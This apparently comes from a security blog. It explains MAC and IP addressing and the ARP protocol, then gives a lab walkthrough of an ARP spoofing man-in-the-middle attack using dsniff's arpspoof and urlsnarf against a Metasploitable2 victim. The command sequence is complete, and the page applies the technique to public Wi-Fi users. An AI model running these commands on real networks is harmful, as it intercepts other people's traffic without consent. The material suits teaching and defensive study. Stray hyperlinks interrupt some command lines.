Whenever you walk into a coffee shop or a public place offering a free Wi-Fi connection, someone can capture your unencrypted web traffic through ARP Spoofing. This is a hacking technique that exploits the vulnerabilities of the ARP—Address Resolution Protocol.
How does the Internet transmit data?
The Internet transmits data using a hierarchical architecture using packets, MAC addresses, and IP addresses:
- Packets: a packet is like an envelope containing the data to be sent over the Internet. Their headers contain the source and destination of the data.
- MAC address: Every device contains a Network Interface Card (NIC) that allows to connect it to the Wi-Fi router. This card has a unique address, called a Media Access Control (MAC) address, identifying your device on the local network.
- IP Address: This is a logical address used to locate devices on local or global networks and is used by routers to forward packets between networks.
The key differences between a MAC address and an IP address are as follows:
| Feature | MAC address | IP address |
|---|---|---|
| Full name | Media Access Control address | Internet Protocol address |
| Purpose | Unique identifier for network hardware (physical address) | Logical address used for locating devices on networks |
| Layer | Layer 2 (Data link layer) | Layer 3 (Network layer) |
| Format | 00:1A:2B:3C:4D:5E (Hexadecimal, 48-bit) | IPv4: 192.168.1.10, IPv6: 2001:0db8::1 (Logical, binary) |
| Assigned by | Manufacturer (hardcoded into NIC) | Network or ISP (dynamically or statically assigned) |
| Scope | Local network only | Global or local network |
| Persistence | Fixed (but spoofable) | Can change frequently (DHCP, mobility) |
| Used by | Switches and NICs to route frames within LANs | Routers to forward packets between networks |
| Visibility | Visible only within local subnet | Visible across the internet (for public IPs) |
- Simply put, the MAC address identifies WHO you are, while the IP address identifies WHERE you are on the network.
What is ARP?
ARP stands for Address Resolution Protocol. It’s a Layer 2 protocol used to map an IP address (Layer 3) to a MAC address (Layer 2) within a local area network (LAN).
How does the router know the machine’s MAC address at a specific IP address? When a device wants to communicate with another on the same LAN, it must know the recipient’s MAC address. It sends out an ARP request like the one below:
# ARP request (<a href="https://negativepid.blog/the-christchurch-mosque-shooting/">broadcast</a>)
Who has 192.168.1.1? Tell 192.168.1.100
The device with that IP responds with its MAC, and your machine saves it in its ARP table.
# ARP reply (unicast)
192.168.1.1 is at aa:bb:cc:dd:ee:ff
The ARP table maps who and where you are on the network.
What are ARP spoofing attacks?
- ARP Spoofing (or ARP Poisoning) is a Man-In-The-Middle (MITM) attack technique that exploits ARP.
Performing an ARP Spoofing attack
In the demo below, we show you how to perform an ARP Spoofing attack from start to end.
Below are the commands used in the demo to perform the attack from a Kali machine:
Install the dsniff tool as root on your machine to execute the attack (here, Kali). This tool contains several packages for intercepting network traffic, such as arpspoof, which performs an ARP Spoofing attack.
sudo -i
apt-get <a href="https://negativepid.blog/the-solarwinds-supply-chain-attack/">update</a>
apt-get install dsniff
Discover the other machines on the network. Our demo shows a PfSense router and a Metasploitable2 machine as the victim. The router on your network will have the lowest IP address.
sudo netdiscover
Next, you need to enable IP forwarding on your machine so that you can forward packets on behalf of other machines.
echo 1 > /proc/sys/net/ipv4/ip_forward
You can now generate multiple ARP requests stating that your MAC address maps to the router’s address.
arpspoof -i eth0 -t <victim IP> <router IP>
You’ll now trick the router into believing that you are the victim’s machine so you can intercept their traffic. Note that the P addresses are now swapped.
arpspoof -i eth0 -t <router IP> <victim IP>
Now, launch a listener to intercept your victim’s traffic.
urlsnarf -i eth0
You can now switch to the victim’s machine and generate some traffic.
wget http://www.google.com